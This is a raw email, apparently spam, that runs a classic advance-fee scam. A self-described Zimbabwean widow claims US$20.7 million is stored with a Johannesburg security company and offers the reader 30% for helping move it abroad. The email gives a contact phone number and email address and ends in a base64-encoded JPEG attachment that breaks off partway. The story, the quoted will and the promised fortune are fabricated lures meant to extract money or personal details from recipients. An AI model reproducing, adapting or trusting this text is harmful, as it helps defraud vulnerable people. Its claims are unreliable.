My name is Mrs.Monica Martins, the wife of late Mr.Zulu
Martins, of Zimbabwe. It might be a surprise to you where I
got your contact address I got it from the net.I am using
this opportunity to express my predicaments to you
During the current crises against the farmers of Zimbabwe
by the supporters of our President ROBERT MUGABE to claim
all the white owned farms in our country, he 
ordered all the white farmers to surrender their farms to
his party members and their followers. 
My husband was one of the best farmers in the country and
knowing that he did not support the president's political
ideology, the president's supporters invaded my husband's
farm, burnt down everything, shot him and as a result of
the wounds sustained, he became sick and died after two
days. And after his death I became a widow over night with
my only son (Frank Martins) and one daughter (Russ) decided
to move out of Zimbabwe for the safety of our lives to
South Africa. Before he died, he wrote his 'WILL' which
reads:
 
'MY BELOVEED SON (Frank) I WISH TO DRAW YOUR ATTENTION TO
THE SUM OF 
US$20.7 MILLION U.S DOLLARS WHICH I DEPOSITED IN A BOX WITH
A SECURITY COMPANY IN JOHANNESBURG (SOUTH-AFRICA) IN CASE
OF MY ABSENCE ON EARTH CAUSED BY DEATH ONLY' 
you should solicit for reliable foreign partner to assist
you to transfer this money out of SOUTH-AFRICA for the
family care and investment purposes I deposited the money
in your  name(Frank Martins)and it can be claimed by you
with the help of a foreign partner using the deposit
code.Your mother has all the documents.Take good care of
your mother and your sister.

>From the above you will understand that the lives and
future of my family depends on this money as much as I will
be very grateful if you can assist us. We are now living in
South-Africa as POLITICAL ASYLUM SEEKERS and the financial
law of SOUTH-AFRICA do not allow an ASYLUM SEEKER any
financial right to operate such huge amount of money .In
view of this I cannot invest this money in South-Africa
hence I am asking you to assist us transfer this money out
of South-Africa for investment purposes. 

[1]. For your efforts I am prepared to offer you 30% of the
total fund while 70% will be kept for my family and I for
investments.Immediately we establish trust within our
selves, I would go ahead to give you all the details you
might require to know about this fund.

YOU CAN GIVE US A CALL ON +27-83-238-3440.YOU SEND YOUR
RESPONSE TO (monica_mtf5@yahoo.co.uk 
ATTACHED IS A PHOTOGRAPH OF THE CONSIGNMENT MY LATE HUSBAND
TOOK BEFORE DEPOSITING THE FUND WITH THE SECURTY
COMPANY.
 
PLEASE YOU CAN READ ABOUT PROBLEMS IN ZIMBABWE FROM THE
LINKS BELOW.
 
http://news.bbc.co.uk/1/hi/world/africa/918781.stm 
http://news.bbc.co.uk/1/hi/world/africa/715001.stm 
http://news.bbc.co.uk/1/hi/world/africa/1063785.stm

BEST REGARDS, 
MRS MONICA MARTINS.
(FOR THE FAMILY

--_===285758567====mail01.infosat.net===_
Content-Type: image/pjpeg
Content-Disposition: attachment;
 filename="money box.jpg"
Content-Transfer-Encoding: base64

/9j/4AAQSkZJRgABAgAAAQABAAD/2wCEAAUJCgwKCA0MCwwPDg0QFCIWFBISFCkdHxgiMSsz
MjArLy42PE1CNjlJOi4vQ1xESVBSV1dXNEFfZl5UZU1VV1MBBQ8PFBIUJxYWJ1M3LzdTU1NT
U1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU//EAaIAAAEF
AQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKCxAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEG
E1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpT
VFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2
t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6AQADAQEBAQEBAQEB
AAAAAAAAAQIDBAUGBwgJCgsRAAIBAgQEAwQHBQQEAAECdwABAgMRBAUhMQYSQVEHYXETIjKB
CBRCkaGxwQkjM1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVGR0hJSlNUVVZXWFla
Y2RlZmdoaWpzdHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLD
xMXGx8jJytLT1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/AABEIAwAEAAMBIQACEQEDEQH/
2gAMAwEAAhEDEQA/AOCGeeBT+c/drrOMd0HIpfl9DQUKdpNLtGeDQSOGPXnvT8e9AxuMc5pc
HtQAzB3ZpoGCRTAXHHSjnNIA6nFL0A60CE70negBD16ml79aAHjOetOJ4pDK38XSpfwpiE6Y
44pvQ9DQIfkY60uQaBjO9L2oAQd+BikI6YFADz0yARScZoEMOCRijkjrxQAHjoaQg0hMXHoK
UqetMY3qenFKeOoPNIAxSHHTP4UFGgArW8g78CsJs561IyPB2mo+1IDbtAwhl44wBVaTqnB+
8KTKQ7XhieMkk/ucgnnFeh3X7sQID9yBFyPpXivqeiYjDzODkgckipHTmPaCUXJIH0616VKy
icNRtM9CuJXgs7dEZSSmMBdxVTzn2rn2KuqqEJYDoeMVg9WZua69DNtpbi0nl2jaNhADc8Gu
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
